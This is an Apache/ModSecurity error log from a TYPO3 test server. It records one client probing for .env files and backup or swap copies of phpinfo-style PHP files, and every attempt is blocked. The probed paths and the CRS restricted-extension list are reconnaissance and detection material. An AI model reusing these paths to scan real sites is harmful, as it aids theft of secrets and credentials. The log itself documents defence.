[Sun Nov 16 12:39:53.373492 2025] [:error] [pid 113276] [client 3.8.102.89:47966] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aRm4CbXvaf1IcB4yJOvFBAAAAAU"]
[Sun Nov 16 12:39:53.460963 2025] [authz_core:error] [pid 107792] [client 3.8.102.89:47970] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Sun Nov 16 12:39:53.501027 2025] [:error] [pid 113290] [client 3.8.102.89:47982] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aRm4CX9I9DIP5OQurvpqmAAAAAQ"]
[Sun Nov 16 12:39:53.501270 2025] [:error] [pid 113290] [client 3.8.102.89:47982] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aRm4CX9I9DIP5OQurvpqmAAAAAQ"]
[Sun Nov 16 12:39:53.501435 2025] [:error] [pid 113290] [client 3.8.102.89:47982] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aRm4CX9I9DIP5OQurvpqmAAAAAQ"]
[Sun Nov 16 12:39:53.561307 2025] [:error] [pid 113283] [client 3.8.102.89:47996] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aRm4CQ0D7yRPJp9gclT4jAAAAAM"]
[Sun Nov 16 12:39:53.561499 2025] [:error] [pid 113283] [client 3.8.102.89:47996] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aRm4CQ0D7yRPJp9gclT4jAAAAAM"]
[Sun Nov 16 12:39:53.561694 2025] [:error] [pid 113283] [client 3.8.102.89:47996] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aRm4CQ0D7yRPJp9gclT4jAAAAAM"]
[Sun Nov 16 12:39:53.561853 2025] [:error] [pid 113283] [client 3.8.102.89:47996] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aRm4CQ0D7yRPJp9gclT4jAAAAAM"]
[Sun Nov 16 12:40:39.914903 2025] [authz_core:error] [pid 113296] [client 3.8.102.89:48274] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/info.php.bak
[Sun Nov 16 12:40:39.985016 2025] [authz_core:error] [pid 113903] [client 3.8.102.89:48290] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpinfo.php.bak
[Sun Nov 16 12:40:46.875056 2025] [:error] [pid 113276] [client 3.8.102.89:48302] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aRm4PrXvaf1IcB4yJOvFBwAAAAU"]
[Sun Nov 16 12:40:46.875411 2025] [:error] [pid 113276] [client 3.8.102.89:48302] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aRm4PrXvaf1IcB4yJOvFBwAAAAU"]
[Sun Nov 16 12:40:46.875581 2025] [:error] [pid 113276] [client 3.8.102.89:48302] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aRm4PrXvaf1IcB4yJOvFBwAAAAU"]
[Sun Nov 16 12:40:46.888417 2025] [authz_core:error] [pid 107814] [client 3.8.102.89:48316] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.php.bak
[Sun Nov 16 12:40:46.905437 2025] [:error] [pid 107792] [client 3.8.102.89:48340] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aRm4Pu0VDMccOZESIOBvvQAAAAA"]
[Sun Nov 16 12:40:46.905750 2025] [:error] [pid 107792] [client 3.8.102.89:48340] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aRm4Pu0VDMccOZESIOBvvQAAAAA"]
[Sun Nov 16 12:40:46.905910 2025] [:error] [pid 107792] [client 3.8.102.89:48340] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aRm4Pu0VDMccOZESIOBvvQAAAAA"]
[Sun Nov 16 12:40:46.910462 2025] [authz_core:error] [pid 113290] [client 3.8.102.89:48332] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_info.php.bak
[Sun Nov 16 12:40:59.316603 2025] [:error] [pid 113283] [client 3.8.102.89:57950] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aRm4Sw0D7yRPJp9gclT4jwAAAAM"]
[Sun Nov 16 12:40:59.316916 2025] [:error] [pid 113283] [client 3.8.102.89:57950] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aRm4Sw0D7yRPJp9gclT4jwAAAAM"]
[Sun Nov 16 12:40:59.317070 2025] [:error] [pid 113283] [client 3.8.102.89:57950] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aRm4Sw0D7yRPJp9gclT4jwAAAAM"]
[Sun Nov 16 12:40:59.322723 2025] [:error] [pid 113274] [client 3.8.102.89:57910] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aRm4S44DuVT7Zp3PDSdxLQAAAAE"]
[Sun Nov 16 12:40:59.323035 2025] [:error] [pid 113274] [client 3.8.102.89:57910] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aRm4S44DuVT7Zp3PDSdxLQAAAAE"]
[Sun Nov 16 12:40:59.323189 2025] [:error] [pid 113274] [client 3.8.102.89:57910] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aRm4S44DuVT7Zp3PDSdxLQAAAAE"]
[Sun Nov 16 12:40:59.330965 2025] [:error] [pid 113296] [client 3.8.102.89:57914] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aRm4S_7nuvXY8JVEGWXCigAAAA8"]
[Sun Nov 16 12:40:59.331239 2025] [:error] [pid 113296] [client 3.8.102.89:57914] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aRm4S_7nuvXY8JVEGWXCigAAAA8"]
[Sun Nov 16 12:40:59.331380 2025] [:error] [pid 113296] [client 3.8.102.89:57914] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aRm4S_7nuvXY8JVEGWXCigAAAA8"]
[Sun Nov 16 12:40:59.335360 2025] [:error] [pid 107823] [client 3.8.102.89:57942] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aRm4S2ZlvYqdbt58w-ZoTAAAABA"]
[Sun Nov 16 12:40:59.335627 2025] [:error] [pid 107823] [client 3.8.102.89:57942] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aRm4S2ZlvYqdbt58w-ZoTAAAABA"]
[Sun Nov 16 12:40:59.335768 2025] [:error] [pid 107823] [client 3.8.102.89:57942] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aRm4S2ZlvYqdbt58w-ZoTAAAABA"]
[Sun Nov 16 12:40:59.352775 2025] [:error] [pid 113903] [client 3.8.102.89:57956] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aRm4S6K4kxSjhxan99Mk9wAAAAY"]
[Sun Nov 16 12:40:59.353090 2025] [:error] [pid 113903] [client 3.8.102.89:57956] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aRm4S6K4kxSjhxan99Mk9wAAAAY"]
[Sun Nov 16 12:40:59.353239 2025] [:error] [pid 113903] [client 3.8.102.89:57956] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aRm4S6K4kxSjhxan99Mk9wAAAAY"]
[Sun Nov 16 12:40:59.397100 2025] [authz_core:error] [pid 107792] [client 3.8.102.89:57988] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpinfo.php~
[Sun Nov 16 12:40:59.401031 2025] [:error] [pid 113290] [client 3.8.102.89:58000] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aRm4S39I9DIP5OQurvpqnAAAAAQ"]
[Sun Nov 16 12:40:59.401352 2025] [:error] [pid 113290] [client 3.8.102.89:58000] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aRm4S39I9DIP5OQurvpqnAAAAAQ"]
[Sun Nov 16 12:40:59.401524 2025] [:error] [pid 113290] [client 3.8.102.89:58000] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aRm4S39I9DIP5OQurvpqnAAAAAQ"]
[Sun Nov 16 12:40:59.429119 2025] [authz_core:error] [pid 111778] [client 3.8.102.89:58026] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpinfo.php.swp
[Sun Nov 16 12:40:59.436124 2025] [authz_core:error] [pid 113274] [client 3.8.102.89:58036] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/info.php~
[Sun Nov 16 12:40:59.440995 2025] [authz_core:error] [pid 113296] [client 3.8.102.89:58020] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.php~
[Sun Nov 16 12:40:59.484834 2025] [authz_core:error] [pid 113903] [client 3.8.102.89:58078] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_info.php~
[Sun Nov 16 12:40:59.494397 2025] [authz_core:error] [pid 107792] [client 3.8.102.89:58072] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.php.swp
